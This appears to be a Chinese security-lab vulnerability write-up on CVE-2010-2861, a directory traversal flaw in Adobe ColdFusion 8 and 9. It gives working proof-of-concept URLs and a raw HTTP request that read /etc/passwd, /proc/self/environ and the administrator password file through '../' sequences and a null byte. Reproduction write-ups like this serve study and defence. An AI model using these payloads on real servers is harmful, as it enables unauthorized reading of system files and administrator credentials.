【初级】Adobe ColdFusion文件读取漏洞

CVE-2010-2861

漏洞描述:Adobe ColdFusion是美国Adobe公司的一款动态Web服务器产品,其运行的CFML(ColdFusion Markup Language)是针对Web应用的一种程序设计语言。

Adobe ColdFusion 8、9版本中存在一处目录穿越漏洞,可导致未授权的用户读取服务器任意文件。

影响版本:Adobe ColdFusion 8、9版本

参考资料:

https://github.com/vulhub/vulhub/blob/master/coldfusion/CVE-2010-2861/README.zh-cn.md

https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/coldfusion-admin-compromise-analysis-cve-2010-2861/

POC:

http://your-ip:8500/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../etc/passwd%00en

读取后台管理员密码
http://your-ip:8500/CFIDE/administrator/enter.cfm?locale=../../../../../../../lib/password.properties%00en

漏洞复现

图片[1]-【初级】Adobe ColdFusion文件读取漏洞-NGC660 安全实验室
GET /CFIDE/administrator/enter.cfm?locale=../../../../../../../../../proc/self/environ%00en HTTP/1.1

Host: 123.58.224.8:33983

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8

Accept-Language: zh-CN,en;q=0.7,en-US;q=0.3

Accept-Encoding: gzip, deflate

Connection: close

Cookie: CFID=2; CFTOKEN=93764139

Upgrade-Insecure-Requests: 1

图片[2]-【初级】Adobe ColdFusion文件读取漏洞-NGC660 安全实验室
© 版权声明
THE END
喜欢就支持一下吧
点赞14 分享